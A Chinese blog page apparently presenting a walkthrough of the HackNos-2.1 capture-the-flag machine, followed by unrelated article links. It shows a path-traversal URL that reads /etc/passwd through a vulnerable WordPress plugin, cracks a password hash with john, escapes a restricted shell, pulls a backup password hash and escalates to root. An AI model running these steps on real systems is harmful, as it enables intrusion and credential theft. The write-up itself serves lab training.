当前位置: 首页 > news >正文

OS-HACKNOS-2.1

news 来源:原创 2024/9/20 7:55:23

确定靶机IP地址

扫描靶机开放端口信息

目录扫描

访问后发现个邮箱地址

尝试爆破二级目录

确定为wordpress站

利用wpscan进行漏洞扫描 #扫描所有插件

wpscan --url http://192.168.0.2/tsweb -e ap

发现存在漏洞插件

cat /usr/share/exploitdb/exploits/php/webapps/46537.txt

存在文件包含漏洞,这里查看到/etc/passwd的内容,复制flag的哈希值用john进行爆破

http://192.168.0.2/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash' > test

gunzip /usr/share/wordlists/rockyou.txt.gz

john test --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt  #topsecret

密码

#flag用户的shell是rbash shell,需要提升shell权限

python3 -c 'import pty;pty.spawn("/bin/bash")'

常规信息收集不具备提权条件,进行备份文件的查找或者上传内核漏洞检测脚本

find / -name  backups

在备份文件/var/backups/passbkp中成功找到rohit用户的密码$1$rohit$01Dl0NQKtgfeL08fGrggi0

通过sudo -l可以看到所有的权限,直接用sudo su就可以切换到root

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 快速上手LangChain:构建强大的语言模型应用
  • 量化交易常用名词介绍(七)——模块篇
  • 面向 Rust 新手的 Cargo 教程:轻松上手
  • Dockerfile 怎么在shell脚本中启动
  • springboot高校讲座预约管理系统-计算机毕业设计源码21634
  • 英语成绩一直很差?那是你学习不得法,英语应该这样学
  • Solidity:变量数据存储和作用域 storage/memory/calldata
  • MyBatisPlus的Mapper.xml入参List执行in函数
  • WordPress网站维护工作包括哪些
  • (附源码)c#+winform实现远程开机(广域网可用)
  • vscode 工程中 c_cpp_properties.json文件作用
  • c++ primer plus 第15章友,异常和其他:异常,15.3.7 其他异常特性
  • AI古风插画视频:成都亚恒丰创教育科技有限公司
  • 智启未来,共筑工业软件新梦 ——清华大学博士生天洑软件实习启航
  • 2-添加库
  • 【跃迁之路】【463天】刻意练习系列222(2018.05.14)
  • 2017-08-04 前端日报
  • 2018以太坊智能合约编程语言solidity的最佳IDEs
  • CentOS 7 修改主机名
  • FastReport在线报表设计器工作原理
  • IDEA 插件开发入门教程
  • Laravel5.4 Queues队列学习
  • socket.io+express实现聊天室的思考(三)
  • windows下如何用phpstorm同步测试服务器
  • 从零开始的webpack生活-0x009:FilesLoader装载文件
  • 大型网站性能监测、分析与优化常见问题QA
  • 力扣(LeetCode)22
  • 原生Ajax
  • PostgreSQL 快速给指定表每个字段创建索引 - 1
  • Spring第一个helloWorld
  • ​Benvista PhotoZoom Pro 9.0.4新功能介绍
  • #565. 查找之大编号
  • (03)光刻——半导体电路的绘制
  • (2)(2.10) LTM telemetry
  • (4) openssl rsa/pkey(查看私钥、从私钥中提取公钥、查看公钥)
  • (C++)八皇后问题
  • (JS基础)String 类型
  • (Redis使用系列) Springboot 使用redis实现接口Api限流 十
  • (七)MySQL是如何将LRU链表的使用性能优化到极致的?
  • (七)微服务分布式云架构spring cloud - common-service 项目构建过程
  • (四)c52学习之旅-流水LED灯
  • (四)linux文件内容查看
  • (四)Tiki-taka算法(TTA)求解无人机三维路径规划研究(MATLAB)
  • (五)关系数据库标准语言SQL
  • (终章)[图像识别]13.OpenCV案例 自定义训练集分类器物体检测
  • (转)Oracle 9i 数据库设计指引全集(1)
  • (转)socket Aio demo
  • *2 echo、printf、mkdir命令的应用
  • *p++,*(p++),*++p,(*p)++区别?
  • ../depcomp: line 571: exec: g++: not found
  • .bat批处理(八):各种形式的变量%0、%i、%%i、var、%var%、!var!的含义和区别
  • .NET 4.0中使用内存映射文件实现进程通讯
  • .NET CLR基本术语
  • .net core 6 使用注解自动注入实例,无需构造注入 autowrite4net
  • .NET delegate 委托 、 Event 事件